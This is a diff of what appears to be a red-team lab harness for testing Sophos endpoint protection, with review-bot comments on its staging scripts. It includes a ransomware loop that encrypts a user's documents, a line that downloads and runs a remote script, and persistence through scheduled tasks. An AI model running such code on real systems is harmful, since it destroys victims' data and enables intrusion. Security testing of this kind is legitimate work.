diff --git a/.DS_Store b/.DS_Store
index 90aebef..1a4c007 100644
Binary files a/.DS_Store and b/.DS_Store differ
diff --git a/atomicredteam b/atomicredteam
index 4e081c2..910fb1d 100644
--- a/atomicredteam
+++ b/atomicredteam
@@ -3,4 +3,4 @@ Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser -Force; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicsfolder.ps1' -UseBasicParsing); Install-AtomicsFolder;
-Invoke-AtomicTest All -Confirm:$false;
+Invoke-AtomicTest All -Confirm:$false;
\ No newline at end of file
diff --git a/outlook.py b/backups/outlook.py
similarity index 100%
rename from outlook.py
rename to backups/outlook.py
diff --git a/scheduledtask b/backups/scheduledtask
similarity index 100%
rename from scheduledtask
rename to backups/scheduledtask
diff --git a/filelessransomware b/filelessransomware
index 6966fba..0bc3ed6 100644
--- a/filelessransomware
+++ b/filelessransomware
@@ -12,4 +12,4 @@ return ,$fullData}; foreach($f in Get-ChildItem 'C:\Users\Sophos\Documents') {Get-Content -path $f.fullname -TotalCount 1; rename-item -path $f.fullname -newname ($f.fullname + '.0wnd'); [IO.File]::WriteAllBytes(($f.fullname + '.0wnd'), (Encrypt-String $key ([IO.File]::ReadAllBytes($f.fullname + '.0wnd'))));
-start-sleep -s 4}
+start-sleep -s 4}
\ No newline at end of file
diff --git a/poc-eap_watcher.ps1 b/poc-eap_watcher.ps1
new file mode 100644
index 0000000..6b626af
--- /dev/null
+++ b/poc-eap_watcher.ps1
@@ -0,0 +1,11 @@
+Function eapcheck {
+$keyPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Management\Policy\ThreatProtection\*\amsi_protection"
+$keyVal = "amsi_protection_block_on_detect"
+$check = Get-ItemProperty -Path $keyPath | Select $keyVal
+write-host $newCheck.$keyVal
+if($check.$keyVal -eq 0) {
+schtasks /delete /tn "POC EAP Watcher" /F
+Restart-Computer -force
+}
+}
+eapcheck
\ No newline at end of file
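Review bot: `write-host $newCheck.$keyVal` in poc-eap_watcher.ps1 reads a variable that is never assigned — the query result is stored in `$check` two lines above — so the line prints an empty value and should be `write-host $check.$keyVal`. `$keyPath` ends in a wildcard, so `Get-ItemProperty` can return more than one object if several policy subkeys exist; `$check.$keyVal -eq 0` would then filter a collection instead of comparing one value, and the `if` is taken whenever any element is 0 — if exactly one subkey is expected, a comment saying so (or indexing the first element) would make that assumption visible. When the key is absent, `Get-ItemProperty` reports an error and `$check` is `$null`, so the condition is false and the minute-interval task keeps running with nothing recorded, since `write-host` output of a scheduled task is never seen; a `Start-Transcript` or an explicit log line would leave a trace of each poll. The file also lacks a header comment; `# Lab harness: polls the Sophos threat-protection policy value and removes its own task and reboots once amsi_protection_block_on_detect reads 0` would state its purpose.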
diff --git a/poc-stage2.ps1 b/poc-stage2.ps1
new file mode 100644
index 0000000..8732f8f
--- /dev/null
+++ b/poc-stage2.ps1
@@ -0,0 +1,4 @@
+schtasks /create /sc onlogon /tn "POC Stage 3" /tr "c:\threat\poc-stage3.bat" /ru Sophos /F
+Start-Process c:\threat\SophosSetup.exe --quiet -Wait
+schtasks /delete /tn "POC Stage 2" /F
+schtasks /create /sc minute /mo 1 /tn "POC EAP Watcher" /tr "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass c:\threat\poc-eap_watcher.ps1" /ru System /F
\ No newline at end of file
diff --git a/poc-stage3.bat b/poc-stage3.bat
new file mode 100644
index 0000000..877bdad
--- /dev/null
+++ b/poc-stage3.bat
@@ -0,0 +1,4 @@
+start "" /B "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE"
+taskkill /im outlook.exe /f
+"C:\Program Files\Python310\python.exe" -m pip install -r c:\threat\requirements.txt
+"C:\Program Files\Python310\python.exe" c:\threat\{|vars.PythonStager|}
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
index 5814718..263334d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -10,4 +10,4 @@ pywinauto==0.6.8
 pywinauto-recorder==0.5.0
 six==1.16.0
 uiautomation==2.0.16
-WMI==1.5.1
+WMI==1.5.1
\ No newline at end of file
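Review bot: `Start-Process c:\threat\SophosSetup.exe --quiet -Wait` in poc-stage2.ps1 relies on `--quiet` binding positionally to `-ArgumentList`, which reads like a mistyped PowerShell switch; `Start-Process -FilePath c:\threat\SophosSetup.exe -ArgumentList '--quiet' -Wait` states the intent. Nothing checks that the installer exists or returned success before the next line deletes the "POC Stage 2" task, so a failed or missing install leaves the lab in an undefined state with the stage already gone; `-PassThru` and a check of `.ExitCode` would make that failure visible. The script has no header comment; one line naming its place in the sequence the files show (stage 2 installs the agent and registers the "POC Stage 3" and "POC EAP Watcher" tasks) would help whoever maintains the harness.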
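Review bot: The last line of poc-stage3.bat runs `c:\threat\{|vars.PythonStager|}`, which looks like an unexpanded template token rather than a filename, so the committed file cannot run as-is; if a deploy step substitutes it, a comment such as `REM {|vars.PythonStager|} is replaced at deploy time` would document that, and if not, the line is a defect. `start "" /B` returns immediately, so `taskkill /im outlook.exe /f` on the next line may run before Outlook has finished starting; a comment explaining why Outlook is launched and force-killed here would save the next reader from guessing at that ordering. A .bat executes each line regardless of the previous result, so a failed `pip install` still reaches the final line — an `if errorlevel 1 exit /b 1` after it would stop the stage on error.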